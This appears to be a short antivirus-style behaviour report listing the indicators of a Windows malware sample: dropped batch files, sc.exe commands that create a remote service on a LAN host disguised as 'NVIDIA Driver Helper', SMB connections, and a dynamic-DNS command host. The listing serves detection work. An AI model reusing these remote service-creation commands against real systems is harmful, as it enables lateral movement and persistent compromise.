Technical information
- [<HKLM>\SYSTEM\ControlSet001\Services\VM7] 'Start' = '00000002'
- C:\Documents and Settings\carss.exe yy.tmp WWW
- <SYSTEM32>\cmd.exe /c ""C:\Documents and Settings\yy.bat" "
- <SYSTEM32>\sc.exe \\192.168.190.132 config "VM7" binpath= "cmd.exe /c "C:\Documents and Settings\yy.bat"" start= auto type= interact type= own obj= localsystem password= ""
- <SYSTEM32>\cmd.exe /c "C:\Documents and Settings\fw.bat"
- <SYSTEM32>\sc.exe \\192.168.190.132 create "VM7" binpath= "cmd.exe /c "C:\Documents and Settings\yy.bat"" start= auto type= interact type= own displayname= "NVIDIA Driver Helper"
- C:\Documents and Settings\fw.bat
- C:\Documents and Settings\yy.bat
- \Device\LanmanRedirector\192.168.190.132\pipe\svcctl
- C:\Documents and Settings\yy.tmp
- C:\Documents and Settings\carss.exe
- %ALLUSERSPROFILE%\tmp~1.ini
- from <Full path to virus> to C:\ИИґшУг.scr
- 'mm##.3322.org':2013
- '<LAN IP address>':139
- '<LAN IP address>':445
- DNS ASK mm##.3322.org